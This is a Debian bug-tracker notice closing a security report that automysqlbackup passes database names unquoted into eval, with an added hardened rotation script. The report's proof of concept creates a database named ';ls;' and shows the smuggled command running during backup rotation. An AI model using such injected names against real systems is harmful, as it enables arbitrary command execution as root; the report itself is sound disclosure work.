Your message dated Fri, 26 Apr 2013 07:32:31 +0000
with message-id <e1uvd8x-0000du...@franck.debian.org>
and subject line Bug#706099: fixed in automysqlbackup 2.6+debian.3-1
has caused the Debian Bug report #706099,
regarding automysqlbackup: Code injection via unsafe database names inside eval
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
706099: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=706099
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: automysqlbackup
Version: 2.5-6
Severity: grave
Tags: security patch

This is related to http://bugs.debian.org/706095 as
autopostgresqlbackup is a fork of automysqlbackup.

In automysqlbackup, database names are used unmangled and unquoted
inside several evals:

# dgrep eval automysqlbackup 
/usr/sbin/automysqlbackup:#    used "eval" for "rm" commands to try and resolve rotation issues.
/usr/sbin/automysqlbackup:eval rm -f "$BACKUPDIR/latest/*"
/usr/sbin/automysqlbackup:      eval $PREBACKUP
/usr/sbin/automysqlbackup:              eval rm -fv "$BACKUPDIR/weekly/$DB/${DB}_week.$REMW.*"
/usr/sbin/automysqlbackup:              eval rm -fv "$BACKUPDIR/daily/$DB/*.$DOW.sql.*"
/usr/sbin/automysqlbackup:              eval rm -fv "$BACKUPDIR/weekly/week.$REMW.*"
/usr/sbin/automysqlbackup:              eval rm -fv "$BACKUPDIR/daily/*.$DOW.sql.*"
/usr/sbin/automysqlbackup:      eval $POSTBACKUP
/usr/sbin/automysqlbackup:eval rm -f "$LOGFILE"
/usr/sbin/automysqlbackup:eval rm -f "$LOGERR"
#

Proof of concept exploit using code copied and pasted from the script
on the command line. Depending on the configuration, users may be able
to create databases without root access:

# mysqladmin create ';ls;'
# DBNAMES="`mysql --defaults-file=/etc/mysql/debian.cnf --batch --skip-column-names -e "show databases"| sed 's/ /%/g'`"
# echo $DBNAMES 
information_schema ;ls; bangstat mysql performance_schema phpmyadmin test
# for DB in $DBNAMES; do eval echo rm -fv "$BACKUPDIR/weekly/$DB/${DB}_week.$REMW.*"; done
rm -fv /weekly/information_schema/information_schema_week..*
rm -fv /weekly/
acpid           automysqlbackup       console-setup  devpts        grub     
hobbit-client  locale  netdiag     nss      ntp-servers  rsyslog        tmpfs
apache2         autopostgresqlbackup  cron           dphys-config  halt     
hwclock        mbmon   networking  ntp      rcS          smartmontools  useradd
aptitude-robot  bsdmainutils          debsums        fail2ban      hddtemp  
keyboard       mdadm   nfs-common  ntpdate  rsync        ssh
-bash: /: Is a directory
acpid           automysqlbackup       console-setup  devpts        grub     
hobbit-client  locale  netdiag     nss      ntp-servers  rsyslog        tmpfs
apache2         autopostgresqlbackup  cron           dphys-config  halt     
hwclock        mbmon   networking  ntp      rcS          smartmontools  useradd
aptitude-robot  bsdmainutils          debsums        fail2ban      hddtemp  
keyboard       mdadm   nfs-common  ntpdate  rsync        ssh
-bash: _week..*: command not found
rm -fv /weekly/bangstat/bangstat_week..*
rm -fv /weekly/mysql/mysql_week..*
rm -fv /weekly/performance_schema/performance_schema_week..*
rm -fv /weekly/phpmyadmin/phpmyadmin_week..*
rm -fv /weekly/test/test_week..*
#

The patch is the same as in http://bugs.debian.org/706095 except for
maybe line numbers and possibly some context lines, but there's no
(relevant) difference in the relevant lines:

# diff -Bb  <(fgrep eval /usr/sbin/autopostgresqlbackup) <(fgrep eval /usr/sbin/automysqlbackup)
0a1
> #    used "eval" for "rm" commands to try and resolve rotation issues.

                Regards, Axel
-- 
 ,''`.  |  Axel Beckert <a...@debian.org>, http://people.debian.org/~abe/
: :' :  |  Debian Developer, ftp.ch.debian.org Admin
`. `'   |  1024D: F067 EA27 26B9 C3FC 1486  202E C09E 1D89 9593 0EDE
  `-    |  4096R: 2517 B724 C5F6 CA99 5329  6E61 2FF9 CD59 6126 16B5

--- End Message ---
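The hardened form of the rotation step, as an added example that is not part of the bug report or of the automysqlbackup package; the allowlist, the function names and the scratch-directory layout are assumptions:

```shell
#!/bin/bash
# Added example; not code from automysqlbackup or from the bug report.
# Two defences for the eval injection described above:
#  (1) an allowlist check on database names before they reach the shell,
#  (2) the rotation command written without eval, with the glob left
#      outside the quotes so the wildcard still expands.
# Function names, the allowlist and the scratch layout are constructed.

# Conservative allowlist (an assumption, stricter than MySQL permits):
# letters, digits and underscore only. Returns 0 if safe, 1 otherwise.
is_safe_dbname() {
    case "$1" in
        '' | *[!A-Za-z0-9_]*) return 1 ;;
        *) return 0 ;;
    esac
}

# Remove last week's dumps for one database without eval. The variables
# are quoted, so a name such as ';ls;' is a literal path component and is
# never re-parsed as commands; only the trailing '*' is unquoted so that
# pathname expansion still happens (the reason eval was used originally).
rotate_weekly() {
    local backupdir="$1" db="$2" remw="$3"
    if ! is_safe_dbname "$db"; then
        echo "refusing unsafe database name: $db" >&2
        return 1
    fi
    rm -f -- "$backupdir/weekly/$db/${db}_week.$remw".*
}

# Self-check in a scratch directory: the benign database is rotated, the
# hostile name is refused, and no other file is touched. Prints "ok".
demo() {
    local tmp
    tmp=$(mktemp -d) || return 1
    mkdir -p "$tmp/weekly/bangstat"
    : > "$tmp/weekly/bangstat/bangstat_week.17.sql.gz"   # to be rotated
    : > "$tmp/weekly/bangstat/bangstat_week.18.sql.gz"   # must survive
    : > "$tmp/canary"                                    # must survive
    rotate_weekly "$tmp" bangstat 17 || return 1
    if rotate_weekly "$tmp" ';ls;' 17 2>/dev/null; then return 1; fi
    [ ! -e "$tmp/weekly/bangstat/bangstat_week.17.sql.gz" ] || return 1
    [ -e "$tmp/weekly/bangstat/bangstat_week.18.sql.gz" ] || return 1
    [ -e "$tmp/canary" ] || return 1
    rm -rf -- "$tmp"
    echo ok
}
```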
--- Begin Message ---
Source: automysqlbackup
Source-Version: 2.6+debian.3-1

We believe that the bug you reported is fixed in the latest version of
automysqlbackup, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 706...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Thomas Goirand <z...@debian.org> (supplier of updated automysqlbackup package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)



Format: 1.8
Date: Thu, 25 Apr 2013 18:34:36 +0800
Source: automysqlbackup
Binary: automysqlbackup
Architecture: source all
Version: 2.6+debian.3-1
Distribution: unstable
Urgency: high
Maintainer: Thomas Goirand <z...@debian.org>
Changed-By: Thomas Goirand <z...@debian.org>
Description: 
 automysqlbackup - daily, weekly and monthly backup for your MySQL database
Closes: 706099
Changes: 
 automysqlbackup (2.6+debian.3-1) unstable; urgency=high
 .
   * Fixes: Code injection via unsafe database names inside eval calls, thanks
     to Axel Beckert for reporting (Closes: #706099).

--- End Message ---